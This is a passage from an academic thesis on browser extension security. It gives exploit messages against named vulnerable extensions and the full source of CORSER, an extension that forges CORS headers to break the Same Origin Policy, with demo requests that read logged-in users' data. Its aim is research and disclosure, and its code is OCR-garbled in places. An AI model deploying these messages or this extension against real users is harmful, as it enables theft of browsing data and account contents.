to the HTTP Commander [72] Chrome extension in order to trigger the download of any file.

Replace FILE_URL with the URL of the file to download, and FILE_NAME with the name

under which the file will be saved on the user device. Multiple files can be sent in the

message. They will all be downloaded one after the other.

{

type : "HTCOMNET_DOWNLOAD",

files: [{

url: FILE_URL ,

path : F I L E_ N AM E

}]

PUT(0,-845.90042)

6. CASE STUDY 165

}

Listing 8.8 – Download files on the user device, thanks to the HTTP Commander

extension.

Store data in extension storage Listing 8.9 shows messages to send in order to store

and retrieve data in the VisualSP Training for Office 365 [151] Chrome extension

storage. Replace DATA_TO_STORE with the data to be stored in the extension storage.

Later on, send the second message to retrieve data. The data will be sent to iframes in

the page. To collect the data previously stored in the extension storage, before sending the

message, one can simply add an iframe to the webpage, then send the message, collect the

previously stored data from the iframe, and send it back to the parent page.

// S to r e d a ta

{

owner: " V is u al SP " ,

command: " S et U se rI d " ,

data : D A TA _ TO _ ST O RE

}

// R et r ie v e d at a .

{

owner: " V is u al SP " ,

command: " G et U se rI d "

}

Listing 8.9 – Store and retrieve data in VisualSP Training for Office 365 Chrome

extension storage

History, bookmarks, extensions list We show here the case of the Space Galaxy HD

Wallpapers [131]. It is one of the 31 HD Wallpapers from fliptab.io (See Table A.1 in

the appendix) that lets pages matching *.fliptab.io, to manage user history, bookmarks,

extensions list and storage. Listing 8.10 shows the different messages that has to be sent

to get the related information.

// M es s a ge f o r r et r ie v i ng u s er b r ow s i ng h is t o ry

{

type : "history",

act: "get_all"

}

// M es s a ge f o r r et r ie v i ng b oo k m ar k s

{

type : " b o ok ma r ks " ,

act: "get_all"

}

// M es s a ge f o r r et r ie v i ng t h e l i st of ex t e ns i on s

{

type : " e x te ns i on s " ,

act: "get_all"

}

Listing 8.10 – The Space Galaxy HD Wallpapers Chrome extension allows to get user

browsing history, bookmarks and extension list

PUT(0,-845.90042)

166 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

6.2 Forcing the attack

In order for an attacker to gain access to an extension’s APIs, he must have a script loaded

in a web application that is allowed to interact with the extension. Moreover, in most

cases, the application has to be running in the user browser in order for communications to

be possible. Figure 8.4 shows a simple scenario in which A.com is an application currently

running in a user browser. This application provides content A.com/content (a script) for

another application B.com which can communicate with an extension to get access to some

privileged APIs. However, B.com is not currently running in the user browser. A.com can

force the attack to happen, by opening B.com (upon a user interaction with the A.com).

Once B.com runs, the script that it embeds from A.com gets executed and can communicate

with the extension to get access to its privileged APIs — for instance to access user data

on any other application — and exfiltrate this to A.com. With the prevalence of some

third party scripts providers among web applications [229], this scenario can be easily

implemented by attackers to gain from extensions capabilities.

Figure 8.4 – A.com forces an attack by opening B.com thereby allowing A.com/content to

load, execute and interact with extensions in order to exfiltrate user data to A.com.

Combining multiple extensions Another scenario where access to any extension capa-

bilities can be indirectly gained is when some extensions make it possible to open new tabs

and inject and execute arbitrary codes in them. We have recorded a video showing the

use of the LinkClicker extension [87] which allows to open a new tab and execute code in

it, and the Space Galaxy HD Wallpapers extension [131] which allows only fliptab.io

to get/delete user browsing history, bookmarks and extensions list. From any application

(the localhost in our example), we opened www.flipatab.io, and injected a code in its

context. The code retrieved the list of extensions, bookmarks and user history. This infor-

mation could be further sent to a server chosen by the attacker. One can even use also the

LinkClicker extension to send the retrieved information back to the attacker by opening

a new tab of the attacker application (localhost in our case). The video is also accessible

at https://swexts.000webhostapp.com/extensions/

7 Discussion

Here we discuss countermeasures to mitigate these security and privacy threats introduced

by browser extensions. We are not disclosing this list of extensions until vendors take a

definitive decision regarding our findings. We did not either publicly share the link to

the videos demonstrating how we exploited extensions. Vendors can deactivate vulnerable

extensions until they are fixed and remove them if their developers are not willing to update

their codes.

PUT(0,-845.90042)

7. DISCUSSION 167

7.1 Browser vendors

We are planning to disclose to vendors the extensions posing any of the security and

privacy threat we have reported in this paper. We also disclose and demonstrate our

analysis, methodology and tool. There is definitely room for further improving the tool.

That notwithstanding, as we have shown in this paper, the tool in its current state has

been able to flag various extensions posing security and privacy threats. We argue that

extensions review processes should also consider the different security and privacy threats

we have identified, in order to help extension developers fix their codes before users install

their extensions. Moreover, since many browsers now support the same cross-browser

WebExtensions API, using a common tool to analyze extensions can help identify similar

or identical potentially malicious extensions, and suggest appropriate actions to fix them.

Furthermore, we think that browser vendors will gain by sharing information with one

another on their extensions review processes. For instance, if an extension is flagged as

malicious and removed by a vendor, this information may be shared with others so that

the same extension may also be removed. Finally, we suggest that browser vendors should

take appropriate means to require that extension developers provide explanations about

the usage of permissions in extensions. This explanation can be given in the form of a

shown to users when they install the extension.

7.2 Web applications developers

To some extent, web application developers can detect SOP bypass, especially when the

requests are made by content scripts injected in a third party web application. By checking

the presence and the value of the Referer header for instance when requests are received

server-side, one can detect whether an AJAX request is originating from a trusted domain,

and therefore authorize or prevent it. We found Twitter and Gmail preventing (responding

with 403 HTTP status) requests from content scripts of third party web applications,

especially when the user was logged in. However, we found no way one can prevent SOP

bypass, when extensions allow the attacker to inject code directly in the web application

he needs to access. This was the case for almost all extensions we identified as allowing

web applications to execute arbitrary code in their context.

7.3 Extensions developers

Most of the issues we have found in extensions are imputable to extensions developers.

The privileged APIs they have access to must be used with care, as they can put at serious

risks, the security and privacy of users. Most of code execution can be avoided by properly

sanitizing messages received from web applications. To avoid leaking user information such

as browsing history, extensions can manage them in extension UI pages instead of using

webpages and message passing to manage them, the reason being that an attacker script

may be present on the webpage. It also seems that some of the SOP bypass are the result

of poor programming practices where extensions allow SOP bypass via message passing

for pages from their own domains in order to avoid supporting CORS. Unfortunately,

an attacker script may also be present on these pages, or when the extension is poorly

programmed, the SOP bypass could be inadvertently enabled for all web applications.

PUT(0,-845.90042)

168 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

7.4 Extensions users

Finally, to users, we suggest to always log out from web applications. This may limit

leaking cookies and data of applications where the user is logged in. By default, extensions

are not allowed in incognito and other private browsing modes. Browsing in such modes,

without any extensions enabled, surely protects users from many of the security and privacy

threats shown in this work.

8 Conclusion

Web applications and browser extensions can interact with one another by exchanging

messages. In this work, we built a static analyzer and applied it to Chrome, Firefox and

Opera extensions. We identified a good number of extensions that enable web applications

to benefit from their privileged capabilities. In particular, some extensions allow web

applications to access any other application data, thereby bypassing the Same Origin Policy

security mechanism. Extensions also leaked user credentials (cookies), browsing history,

bookmarks, list of installed extensions, to web applications or allowed them to download

any file on the user device, or store data in the extension storage for tracking purposes. We

showed how trivially, attackers can exploit those threats, and argued that browser vendors

should take this into consideration while reviewing extensions. The static analysis tool we

have used in this work, could be used to help detect such extensions, and fix or remove

them from browsers.

PUT(0,-845.90042)

Chapter 9

Breaking the Same Origin Policy ! On CORS

headers manipulations by browser extensions

Preamble

This chapter analyzes CORS headers manipulations by browser extensions. It is under

submission.

1 Introduction

Extensions can intercept and modify HTTP communications, in particular the requests

and responses headers between web applications running in the user browser, and web

servers [28,59]. The User-Agent Switcher for Chrome Chrome extension [147] for in-

stance, uses this capability to simulate different browsers, by modifying the User-Agent

request header. When an extension has the capability to manipulate HTTP communica-

tions, it can do so with almost any HTTP request and response header. It can remove

headers, change their values, or even add new ones. Nonetheless, as different HTTP headers

are used for different purposes, tampering with HTTP headers can have various implica-

tions from a security perspective. The X-Frame-Options header for instance, is set by web

servers in HTTP responses to fight against clickjacking attacks [244]. Therefore, remov-

ing this header enables clickjacking attacks. Similarly, the Content-Security-Policy is

used by web applications to deploy Content Security Policies (CSPs) [272,275] to miti-

gate content injection attacks such as XSS (Cross-Site Scripting) [41]. Hence, tampering

with Content-Security-Policy may enable XSS attacks, as it has been demonstrated by

Kapravelos et al. [213] and Hausknecht et al. [200].

In this work, we consider the implications of manipulating Cross-Origin Resource Sharing

(CORS) HTTP headers. With their ability to modify HTTP headers, extensions can

also modify CORS headers. Intuitively, an extension can change or add the appropriate

headers in HTTP requests and responses, in order to always make unauthorized CORS

requests successful. Doing so allows any web application to directly access data, including

user sensitive data on any other web application server, thereby breaking the Same Origin

Policy (SOP). Moreover, if extensions do not correctly handle CORS headers, they can

potentially break legitimate cross-origin requests, even though web servers allow them,

thereby breaking the functionality of web applications that the user is interacting with.

We analyzed the WebExtensions API, the cross-browser extensions system compatible

with major browsers including Chrome, Opera, Firefox and Microsoft Edge [2,25,100,110].

We first of all wanted to assess whether tampering with CORS headers in a extension,

169

PUT(0,-845.90042)

170 CHAPTER 9. EXTENSIONS AND CORS

is considered a security threat from the perspective of browser vendors. To do so, we

developed CORSER, a cross-browser WebExtension. If crafting such an extension takes

little effort, it however requires a correct understanding of the CORS mechanism. We

then decided to publish CORSER on different browsers in order to assess whether browser

vendors consider tampering with CORS headers a security threat. From the perspective

of browser vendors, CORSER is a benign extension as it successfully passed the different

extension review processes. On Firefox, the extension was made public only a few seconds

after we submitted it for review [37]. On Opera, it was published a few minutes after the

review process started [38]. Finally, on Chrome, the extension was made public on the

same day [36].

We also performed an empirical analysis of extensions in the wild. Among the capabilities

or permissions usually requested by extensions, is the ability to intercept and manipulate

HTTP headers, thus CORS headers, for any web application. We therefore built a static

analyzer that flags suspicious extensions potentially tampering with CORS headers. Then,

we manually vetted such extensions and found dozens of them effectively manipulating

CORS headers. This was done mostly to authorize unauthorized CORS requests. But

more surprisingly, we also found that the CORS mechanism is widely misunderstood among

extensions developers, as most of the extensions that manipulate CORS headers do it in a

way that break legitimate CORS requests made by web applications running in the user

browser.

In summary, we make the following contributions

— With a in-depth understanding of the CORS mechanism, we developed the CORSER

extension that tampers with CORS headers to disable the Same Origin Policy in

browsers by authorizing unauthorized cross-origin requests.

— We submitted CORSER for review on different browsers, and it successfully passed

their extensions review processes and was published on Chrome, Firefox and Opera.

— We found that the ability to tamper with CORS, then breaking the SOP is widespread

among extensions. On Firefox, Chrome, and Opera, around 10% of all extensions

have the appropriate permissions for doing so.

— Finally, we statically and manually analyzed extensions source codes. A few of

them manipulate HTTP headers to break the SOP in browsers. Moreover, we also

found that CORS is widely misunderstood among extensions developers. In fact,

many modifications are not done correctly, causing legitimate CORS requests to fail,

thereby breaking the web applications running in the user’s browser.

With these findings, we discuss various countermeasures and the implications of HTTP

headers manipulations by browser extensions. First, from a browser vendor perspective,

we argue that the extensions review process [23,56,118] must take into consideration

HTTP headers manipulations, in particular security critical ones such as CORS head-

ers, Content-Security-Policy and X-Frame-Options. We propose that extensions must

explicitly require dedicated permissions to be able to tamper with security critical headers.

This would enable browser vendors to warn users of the underlying security and privacy

threats that installing such extensions can introduce. In fact, as tampering with HTTP

headers is considered benign from the browser vendors perspective, installing an extension

that disables SOP would not raise any particular warning, despite the fact that tampering

with HTTP headers represent a serious security threat, that users must be aware of. Our

recommendation for users is to use their sensitive web applications in a browser environ-

ment where they do not have any extensions installed. From a developer’s perspective, we

show how to safely manipulate CORS headers. In fact, such extensions can be useful for

PUT(0,-845.90042)

2. BACKGROUND 171

advanced users to perform web applications testing for instance. In these settings, exten-

sions developers can give users more control over the extension and allow them to define

when the extension will be activated, the requests that the extension can manipulate, and

disable the extension when it is not in use. Finally, we discuss how web servers can fight

against CORS headers manipulations done by browser extensions. A web server imple-

menting CORS can detect CORS headers modifications as done by most of the extensions

we analyzed. Nonetheless, this would imply that all servers implement CORS. Unfortu-

nately, this breaks the backwards-compatibility of the mechanism. In fact, normally, when

a web server does not support CORS, it would not return any CORS headers, in which

case the browser would fallback to the default SOP, by blocking the cross-origin request.

2 Background

The capability of extensions that is of interest in this work is their ability to intercept and

manipulate HTTP communications between webpages and web servers, in particular, the

HTTP requests and responses headers.

We specifically consider CORS HTTP headers, whose modifications constitute a serious

rollback in what makes the foundations of modern browsers security model, namely the

Same Origin Policy (SOP) [125]. In its basic form, the SOP prevents cross-origin AJAX

requests. CORS is a refinement of SOP, in which control is completely given to web

servers, which can decide on accepting or rejecting cross-origin AJAX requests. With the

ability given to extensions to manipulate HTTP headers, extensions can simply hijack

web servers control over CORS requests, and always make cross-origin successful, thereby

removing even the basic SOP protection from browsers, allowing any web application to

make cross-origin requests to any other web server, to access user sensitive data. As shown

on Fig. 9.1, HTTP requests go through browser extensions before reaching web servers,

and HTTP responses also go through browser extensions before the responses are handled

by the browser.

Web

Application

Web

Browser

Browser

Extension

Web

Server

21 3

456

http://example.com:8080 http://third.com

Figure 9.1 – CORS requests workflow in presence of an extension with the capability to

intercept and manipulate HTTP headers

2.1 Threat model

The attacker here is any entity willing to make cross-origin requests in order to access user

sensitive data, and exfiltrate them to a server under the control of the attacker. To do

so, the attacker has a script in a web application running in the user browser. The user

has installed an extension that manipulates HTTP headers to allow cross-origin requests,

even when they are not authorized by web servers. The extension can either be poorly

programmed or intentionally malicious. For instance, an extension that modifies CORS

headers could be provided to developers for testing purposes. But if not well programmed,

any script in the user browser could benefit from its presence to also make unauthorized

PUT(0,-845.90042)

172 CHAPTER 9. EXTENSIONS AND CORS

CORS requests to access user data. The attacker can also be a malicious entity that

compromised a benign extension, or an extension developer willing to evade the extensions

review process for user data exfiltration. In fact, even though extensions are not subject to

SOP, and can make cross-origin requests to access user data, extensions would not pass the

review process, if they explicitly make use of AJAX requests to exfiltrate user data directly

from the extension context. As a matter of fact, Opera [118] forbids that an extension

makes explicit XMLHttpRequests [155] to third parties. However, the extension developer

could disable SOP with CORS headers modifications, then inject a malicious script in a

web application running in the user browser, and make any cross-origin request from that

application.

3CORSER extension

In this section, we first present CORSER, a cross-browser extension that intercepts and ma-

nipulates CORS headers in order to authorize unauthorized cross-origin requests. While

developing such an extension requires little effort, it nonetheless requires a good under-

standing of the CORS mechanism [34] and APIs available to extensions for manipulating

HTTP headers [28,59]. We then demonstrate the security implications of such an exten-

sion, as it breaks the Same Origin Policy by allowing an attacker to harvest user data on

any web application, especially those where the user has logged into. Finally we show that

an extension such as CORSER is considered completely benign by browser vendors, as we

published it on Chrome [36], Firefox [37] and Opera [38].

3.1 Permissions to manipulate HTTP headers

To intercept and tamper with all HTTP communications, an extension has to declare the

webRequest and webRequestBlocking permissions, in addition to the host permission for

all HTTP hosts, by specifying the <all_urls> permission for instance.

2"manifest_version": 2 ,

3" n am e " :"CORSER",

4"version":" 1 . 0 " ,

5" b ac k gr o un d " : {

6"scripts": [

7" b ac k gr o un d. j s "

9},

10 "permissions": [

11 " < al l _u rl s >",

12 " w e bR e q u es t " ,

13 " w eb R eq u es t Bl oc ki n g "

14 ]

15 }

Listing 9.1 – Content of the CORSER manifest.json file, with the permissions to

manipulate all HTTP requests

Listing 9.1 shows the full content of the manifest.json file of the CORSER extension. Among

other things are the name of the extension, its version, permissions and the background

page scripts. The background page is the main component of extensions. It executes in

the background, and can make use of all the capabilities declared by the extension.

PUT(0,-845.90042)

3. CORSER EXTENSION 173

3.2 Background page

To manipulate HTTP headers, one has to register handlers (listeners) for events triggered

by HTTP communications between web pages and web servers. Each HTTP request that

is intercepted in extensions go through a set of stages with dedicated events that can be

listened for, in order to take different actions on the HTTP headers [28,59]. The request

is assigned a unique identifier, that remains the same at the different stages of the request.

The response to the request is also assigned the same identifier. This helps to link a request

to its response. Even in the case of preflighted requests, the two sequential requests and

their responses are considered a single request and thus assigned the same identifier.

The code to intercept and manipulate HTTP headers is defined in the background page, de-

clared by the background.js file (Line 7 of Listing 9.1). The whole code of the background

page script is shown in Listing 9.2

2// C ro s s- b ro ws e r ex te n s io n A P I

3chrome =chrome !=null ? ch r o m e : br o w se r ;

5// H TTP r e qu e st s h e ad e r s to r e c o rd

6var co r s Re qu e st H ea de r s ={

7"origin":" " ,

8" a cc e ss - co n tr o l- r eq u es t- me t ho d " :"" ,

9"access-control-request-headers":" "

10 };

12 // H TTP r e sp o ns e s he ad e r s to m o d i fy

13 var corsResponseHeaders ={

14 "access-control-allow-origin":" " ,

15 "access-control-allow-method":" " ,

16 "access-control-allow-headers":" " ,

17 "access-control-allow-credentials":" t ru e "

18 }

20 // G l o ba l o b je c t t o k e e p tr a c k o f H T T P r e qu e st s

21 var savedRequestsHeaders ={};

24 // I nt e rc e pt i ng H T TP r e q ue s ts h e ad e r s

25 chrome.webRequest.onBeforeSendHeaders.addListener(

req u e s tLi s t en e r , {

26 urls : [ " < a ll _ ur l s >"],

27 types: ["xmlhttprequest "]

28 }, [" b l oc k i ng " ,"requestHeaders"] ) ;

31 // M an i pu l at i ng H T TP r e q ue s t h ea d e rs

32 var requestListener =function( d e ta i ls ) {

33 var lcorsHeaders ={}

35 for ( l et h ea d er o f d e t ai l s . re q u es t H ea d e rs ) {

36 if ( h e ad e r. n am e .t o Lo w er C as e () i n c o rs R eq ue s tH e ad e rs ) {

37 l co r s H ea d e r s [ h e ad e r . n am e . t oL o w e r Ca s e ( ) ] =h e a de r .v a lu e ;

38 }

39 }

40 if (" origin" in lcorsHeaders){

PUT(0,-845.90042)

174 CHAPTER 9. EXTENSIONS AND CORS

41 savedRequestsHeaders[details.requestId] =lcorsHeaders

42 }

43 return {

44 re q u es t He a de rs : d et a il s. r eq ue s tH ea d er s

45 };

46 }

49 // I nt e rc e pt i ng H T TP r e s po n se h e ad e r s

50 chrome.webRequest.onHeadersReceived.addListener(responseListener

, {

51 urls : [ " < a ll _ ur l s >"],

52 types: ["xmlhttprequest "]

53 }, [" b lo c ki ng " ,"responseHeaders"] ) ;

57 // M an i pu l at i ng H T TP r e s po n se h e ad e r s

58 var responseListener =function( d e ta i ls ) {

59 if ( details.requestId i n savedRequestsHeaders){

60 let n e w Re sp o ns e He ad e rs =[ ]

61 f or ( l et h e ad e r o f d e t ai l s .r e s p on s e He a d er s ) {

62 if ( !( h ea de r. na me .t oL ow e rC as e () in corsResponseHeaders)){

63 n ew R e sp o ns e He a d er s .p u s h ( he a de r )

64 }

65 }

66 f or ( l et h e ad e r in s a v ed R e q ue s t s He a d e r s [ d e ta i l s .r e q u es t I d ] ) {

67 switch(header){

68 case " o ri gi n " :

69 newResponseHeaders.push({

70 name : "Access-Control-Allow-Origin",

71 v al ue : s av e dR e qu e st s He a de r s [ de ta i ls . re q ue s tI d ] [

header]

72 }) ;

73 break;

74 case " a cc e ss - co n tr o l- r eq u es t- me t ho d " :

75 newResponseHeaders.push({

76 name : "Access-Control-Allow-Methods",

77 v al ue : s av e dR e qu e st s He a de r s [ de ta i ls . re q ue s tI d ] [

header]

78 }) ;

79 break;

80 case "access-control-request-headers":

81 newResponseHeaders.push({

82 name : "Access-Control-Allow-Headers",

83 v al ue : s av e dR e qu e st s He a de r s [ de ta i ls . re q ue s tI d ] [

header]

84 }) ;

85 break;

86 default:

87 break;

88 }

89 }

90 newResponseHeaders.push({

91 name : "Access-Control-Allow-Credentials",

92 value: " t ru e "

PUT(0,-845.90042)

3. CORSER EXTENSION 175

93 }) ;

94 details.responseHeaders =new R es p on s eH ea d er s

95 d el et e s av e dR e qu e st s He a de r s [ de ta i ls . re q ue s tI d ]

96 }

97 return {

98 re s p on s eH ea d er s : de ta i ls .r e sp on s eH ea d er s

99 }

100 }

Listing 9.2 – Content of the background.js file

The following are the main features of the CORSER extension. It starts with the definition

of different objects, in particular the list of CORS requests that are recorded (Lines 6-10),

and response headers that will be changed or added to make any CORS request successful

(Lines 13-18). Then it defines a global object savedRequestHeaders in which intercepted

CORS request headers will be saved (Line 21).

Intercepting HTTP requests The handler of the onBeforeSendHeaders event is the

right place to intercept HTTP requests. Lines 25-28 of Listing 9.2 shows how to intercept

HTTP requests by registering a listener or handler for the onBeforeSendHeaders event.

The extension intercepts all (<all_urls>) headers (requestHeaders) of AJAX requests

(type xmlhttprequest). The requestListener argument is a callback function or handler

that will be invoked to manipulate the requests headers. Its definition is shown from

Lines 32 to 46. In this function, we simply record the values of any CORS request header

(See Table 2.2) found in the cross-origin request (Lines 36-38). The recorded request

headers are then associated to the request unique identifier and saved in the global object

savedRequestHeaders (Line 41).

Intercepting HTTP responses To safely manipulate HTTP response headers, one

can do so by registering a listener for the onHeadersReceived event, as shown from Lines

50-53. Response headers of AJAX requests will be provided to the responseListener

callback function, as defined in Lines 58-100. If the request was a cross-origin request,

it means that we had previously saved its CORS requests headers. So, we use the re-

quest identifier in the response object to link to the CORS request headers previously

saved in a global variable (Line 59). Then, to make the CORS request successful, we

start by removing any CORS response headers returned by the web server (Lines 61-

65), only those that will be modified or added. Then, for each recorded request header,

we add its dual response header by setting the appropriate values (See Table 2.2): the

Access-Control-Allow-Origin header is added and assigned the value of the recorded

Origin header (Lines 68-73); the Access-Control-Allow-Headers header is added and

assigned the value of the recorded Access-Control-Request-Header header (Lines 74-

79); the Access-Control-Allow-Methods is added and assigned the value of the recorded

Access-Control-Request-Method request; finally in order to authorize CORS requests

with credentials, we add the Access-Control-Allow-Credentials response header, as-

signing it the value true (Lines 90-93).

After manipulating the response headers, we remove the recorded request headers from the

global object savedRequestHeaders (Line 95) and return the new response headers (Lines

97-99) 1. These modifications successfully authorize unauthorized CORS requests.

1. To be more precise, we could have removed the recorded request headers in the onCompleted event [28,

59]

PUT(0,-845.90042)

176 CHAPTER 9. EXTENSIONS AND CORS

3.3 Deploying and testing CORSER

The code of the CORSER extension is available online at https://github.com/mesolido/

corser. First we locally deployed (in developer mode) CORSER extension on Chrome,

Firefox, and Opera. We tested it to ensure that it worked as expected. In our demonstration

scenario, we took http://jquery.com as a webpage where an attacker has injected some

code to make AJAX requests to https://www.google.com.

After installing the extension, we navigated to the homepage of http://jquery.com. We

took this page as a webpage for our experiments, mostly because it includes jQuery li-

braries [85] with convenient APIs for making AJAX requests (i.e. $.get, $.ajax). To

make cross-origin AJAX requests, we used the browser console [17]. The request we

made was $.get("https://www.google.com", console.log). The response to the re-

quest were be displayed in the browser console [17].

We deactivated the extension and made a simple CORS request. It got blocked because

https://www.google.com does not authorize cross-origin requests from http://jquery.

com. Fig. 9.2 shows the error message displayed in the browser console. One of the reasons

Figure 9.2 – CORS request blocked with CORSER deactivated

why the request got blocked is because no CORS header was returned. In particular the

Access-Control-Allow-Origin header was missing.

We then activated the extension and made the simple CORS request again. The request

became successful as CORSER added the appropriate CORS headers. Fig. 9.3 shows only

Figure 9.3 – CORSER allows CORS requests

the head of the response to the request. It is the HTML response corresponding to Google

homepage (https://www.google.com).

Finally, we made a cross-origin request with credentials as shown in the following listing.

1$.ajax({

2url: "https://www.google.com",

3xhr F i el d s: {

4withCredentials: true

5},

6suc c e ss : c o ns o le . lo g

7}) ;

When a user is logged into his Google account, the response from https://www.google.com

contains the username and her email address. Fig. 9.4 highlights the user’s email address

in the response. We have chosen this example for the sake of simplicity. Nonetheless

we used CORSER to make successful cross-origin requests in order to access more sensitive

PUT(0,-845.90042)

4. EMPIRICAL STUDY ON CORS HEADERS MANIPULATIONS 177

Figure 9.4 – CORSER allows CORS requests with credentials

information such as reading emails from Gmail, Yahoo Mail, reading information from the

user Twitter account, etc.

3.4 Publishing CORSER

On the 16th of August, we submitted CORSER for review on Chrome, Firefox and Opera,

following their publishing guidelines [23,56,118]. In particular, all browsers required that

extensions do not collect and exfiltrate user data, be self-contained, and performed as

expected. CORSER fully complies with all these requirements.

Despite the clear threats that such an extension poses, none of the browser vendors com-

plained about it. Firefox was the first to accept the extension. Right after it was submitted,

the extension was made public [37]. We were sent an email a few days later to fix a typo

(removing an extra ’s’) in the description on the extension. On Chrome, we had to pay a

5$ fee before publishing the extension. Afterwards, the extension was made public [36] the

same day. Finally, on Opera, the review process of the extension started the day following

its submission. A reviewer complained because we did not specify icons in the manifest

of the extension. After updating the manifest with the icons, the extension was published

right away [38]. The extension already have a few users (202 downloads on Opera, 35 on

Firefox and 7 on Chrome, as of the 13th of October 2018).

4 Empirical study on CORS headers manipulations

In this section, we assess CORS headers manipulations in the wild, in particular whether

extensions tamper with CORS requests, which modifications they bring to CORS requests,

and the threats that this implies.

4.1 Data collection and static analyzer

To do so, we collected Chrome, Firefox and Opera extensions [24,58,108]. The collection of

extensions was automated using the SlimerJS browser automation tool [130]. We consid-

ered only extensions with the permissions to manipulate HTTP headers, including CORS.

These are extensions that declare the webRequest and webRequestBlocking permissions

in their manifest.json file. We then applied a static analyzer to scripts of the extensions

background pages. The static analyzer was written in Node.js [105], using various modules.

In particular, the Jsdom HTML parser [69] was used to parse and extract scripts from ex-

tensions background pages which are declared as HTML files in the manifest.json. The

Esprima [204] parser was used for parsing the background pages scripts. It produced an

Abstract Syntax Tree (AST) of each script, from which we collected the Literal constructs

(i.e. strings, numbers). When we found at least one CORS header among the literals of a

script, the extension was considered suspicious and flagged for further manual analysis.

PUT(0,-845.90042)

178 CHAPTER 9. EXTENSIONS AND CORS

Limitations We considered only background scripts that are bundled in extensions pack-

ages. In fact, browser vendors recommend that extensions be self-contained. To do so,

extensions are applied a default restrictive Content Security Policy (CSP) which bans ex-

ternal libraries by default [31,32,118]. However, an extension developer may still relax

the default CSP of extensions, in order to dynamically load external scripts in background

pages. We therefore miss extensions whose code for manipulating CORS headers might

have been loaded from an external library. Our results therefore represent a lower bound

of extensions that may be tampering with CORS headers.

4.2 Manual analysis

The manual analysis always consisted in first reviewing the code of suspicious extensions

to assess whether they manipulated CORS headers, which headers were manipulated and

how they did so, the web pages whose CORS requests were intercepted, the URLs that

were intercepted, and if a user action was required to activate the ability of the extension

to manipulate CORS headers. For the code review, we installed CRX Viewer [277], a

convenient extension for navigating extensions bundles directly in the browser. Then, we

installed the extension in the browser, interacted with it in order to confirm that it ef-

fectively tampered with CORS headers. The interactions consisted in making cross-origin

requests to different hosts declared in the extension manifest.json. For more control over

the HTTP communications, we setup our own local web server implementing the CORS

mechanism. It enabled us to trigger different behaviors of suspicious extensions regarding

headers manipulations. For extensions we could not confirm just by installing and interact-

ing with them, we would download their package, patch the background scripts with hooks,

before reinstalling and debugging the extensions. The hooks were basically additional lines

of codes added to the extension code that helped us understand how the extension works,

and which requests were to be made to trigger CORS headers manipulations.

Limitations Despite much efforts, for a few extensions, we could not successfully confirm

our suspicion of whether they tampered with CORS headers or not. There are two reasons

for that.

— The extension code was obfuscated, and we did not find a way to deobfuscate and an-

alyze it. For instance, we found extensions written mostly in hexadecimal. The static

analyzer successfully found CORS headers among their literals. However, by inter-

acting with them, the CORS headers was not manipulated, but we cannot confirm

this, as we could not manually review their codes.

— Or the extension had listeners that clearly tampered with CORS headers, but they

were not triggered when we interacted with the extension. This is the case for instance

for the ZenMate VPN, a very popular extension on Chrome [158], Firefox [160] and

Opera [159]. It has a response listener, that if triggered, would have allowed any

cross-origin requests.

4.3 Results overview

We crawled the extensions in the middle of May 2018. Table 9.1 shows an overview of

the data we collected and analyzed, and Table 9.2 presents the top 11 most requested

permissions. Chrome provides the largest share of extensions (66,401) followed by Firefox

(9,391), then Opera, which totalizes 2,523 extensions. It is worth noting that a good

number of extensions do not request any permission. That is 17.52%, 17.32% and 8.08%

of Chrome, Firefox and Opera extensions respectively.

PUT(0,-845.90042)

4. EMPIRICAL STUDY ON CORS HEADERS MANIPULATIONS 179

Chrome Firefox Opera

Extensions 66,401 9,391 2,523

Declare no permissions 11,632 1,627 204

Have webRequest(Blocking) permissions 6,316 1,152 320

Have all hosts permission 5,031 893 265

Extensions analyzed 101 30 5

Tamper with CORS headers 51 11 1

Unconfirmed 5 1 1

Table 9.1 – Data collection and analysis results overview

Permission Chrome Firefox Opera

tabs 49.29 44.19 54.93

storage 37.52 49.91 43.08

activeTab 18.85 25.08 10.90

http://*/* 15.41 8.66 17.24

https://*/* 14.49 8.76 16.53

contextMenus 14.30 17.40 21.56

notifications 14.12 13.36 16.37

webRequest 12.10 17.18 16.17

<all_urls>12.07 18.36 18.15

cookies 9.66 7.55 8.40

webRequestBlocking 9.58 12.29 12.76

Table 9.2 – Most requested permissions among Chrome, Firefox and Opera extensions

PUT(0,-845.90042)

180 CHAPTER 9. EXTENSIONS AND CORS

Extensions with HTTP headers manipulation capabilities

As one can see from Table 9.2, all hosts (<all_urls>,http://*/* or https://*/*),

webRequest, and webRequestBlocking are among the most requested permissions. Ex-

tensions that declare both the webRequest and webRequestBlocking permissions, giving

them the ability to tamper with HTTP headers represent 9.51%, 9.51% and 12.63% of

Chrome, Firefox and Opera extensions respectively (See Table 9.1). This represents all

extensions which can potentially tamper with CORS headers in order to disable the Same

Origin Policy in browsers and authorize cross-origin requests. It is simply a coincidence

(and not an error) that Chrome and Firefox have the same share of extensions that can

manipulate HTTP requests. It is worth mentioning that among these extensions with

headers manipulation capabilities, 79.65%, 77.52% and 82.81% of them on Chrome, Fire-

fox and Opera respectively, can do so for any HTTP request, as they also declare all hosts

(<all_urls>,http://*/* or https://*/*) permissions, along with the webRequest and

webRequestBlocking permissions.

Chrome Productivity (33.35%), Photos (11.85%),

Developer Tools (11.55%)

Firefox Privacy & Security (20.33%), Social &

Communication (14.79%), Web Develop-

ment (13.79%)

Opera Productivity (26.33%), Privacy & Security

(21.32%), Social (13.79%)

Table 9.3 – Top 3 most popular categories among extensions with the ability to manipulate

HTTP headers

Categories of extensions Table 9.3 presents for each browser the top 3 most popular

categories among extensions with capabilities to tamper with HTTP headers. Productivity

is the most popular category among Chrome and Opera extensions. This category however

does not exist on Firefox, where Privacy & Security is the most popular category. Privacy

& Security category is also the second most popular on Opera. It includes adblockers

and privacy extensions such as Adblock, Ghostery and uBlock Origin, which are popular

on Chrome, Firefox and Opera. There is no Privacy & Security category on Chrome.

Nonetheless, most of the Privacy & Security extensions are classified in the Productivity

category, which is the most popular category on Chrome. The fact that privacy and

security extensions tamper with HTTP headers is something that can be easily understood

because most of them intercept HTTP communications in order to block advertisements

and other trackers. Social and Developer categories are also popular among extensions

with the ability to manipulate HTTP headers. In particular, Developer category is the top

third category on Chrome and Firefox. Among those are extensions used by developers

for testing purposes such as user agent switchers. The extensions User-Agent Switcher

for Chrome [147], User-Agent Switcher [146] on Opera and User-Agent Switcher [146]

on Firefox tamper with the User-Agent request header to simulate different browsers.

It is surprising however that Social and Photos categories appeared as one of the most

